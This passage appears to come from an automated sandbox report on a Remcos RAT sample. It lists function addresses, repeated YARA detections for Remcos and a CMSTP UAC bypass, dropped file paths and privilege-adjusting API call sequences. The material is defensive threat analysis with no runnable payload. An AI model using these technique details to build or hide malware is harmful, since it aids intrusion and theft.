                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0041F18B19_2_0041F18B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0044627019_2_00446270
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0043E34B19_2_0043E34B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_004533AB19_2_004533AB
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0042742E19_2_0042742E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0043756619_2_00437566
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0043E5A819_2_0043E5A8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_004387F019_2_004387F0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0043797E19_2_0043797E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_004339D719_2_004339D7
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0044DA4919_2_0044DA49
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00427AD719_2_00427AD7
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0041DBF319_2_0041DBF3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00427C4019_2_00427C40
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00437DB319_2_00437DB3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00435EEB19_2_00435EEB
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0043DEED19_2_0043DEED
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00426E9F19_2_00426E9F
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F786B519_2_06F786B5
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F8E78019_2_06F8E780
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F7470E19_2_06F7470E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F7829D19_2_06F7829D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F940E219_2_06F940E2
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F6816519_2_06F68165
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F7EE5319_2_06F7EE53
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F86FA719_2_06F86FA7
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F78F1F19_2_06F78F1F
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F7EC2419_2_06F7EC24
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F76C2219_2_06F76C22
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F54D3C19_2_06F54D3C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F78AEA19_2_06F78AEA
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F6880E19_2_06F6880E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F6897719_2_06F68977
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F5E92A19_2_06F5E92A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F7952719_2_06F79527
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F7F2DF19_2_06F7F2DF
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F7F08219_2_06F7F082
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F5FEC219_2_06F5FEC2
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F77DA119_2_06F77DA1
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F67BD619_2_06F67BD6
                  Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7823E3448 appears 72 times
                  Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7823E081C appears 36 times
                  Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7823E498C appears 40 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06F75BA7 appears 54 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 00434801 appears 41 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06F42B9C appears 34 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 00401E65 appears 34 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06F75538 appears 41 times
                  Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6A29CD1C8 appears 41 times
                  Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6A2AD64A6 appears 173 times
                  Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6A2A87BAC appears 34 times
                  Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6A29FBC9C appears 280 times
                  Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6A2A5EB98 appears 93 times
                  Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6A2A87D70 appears 35 times
                  Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6A2ACF1B8 appears 183 times
                  Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6A2ACF11C appears 37 times
                  Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6A2A80D10 appears 181 times
                  Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6A2A7ABFC appears 818 times
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02AA4500 appears 33 times
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02AA4860 appears 949 times
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02AA44DC appears 74 times
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02AB89D0 appears 45 times
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02AB894C appears 56 times
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02AA46D4 appears 244 times
                  Source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.rans.bank.troj.spyw.expl.evad.winBAT@55/22@240/3
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,3_2_00007FF7823D32B0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,6_2_00007FF6A2AA826C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,19_2_0041798D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F586C4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,19_2_06F586C4
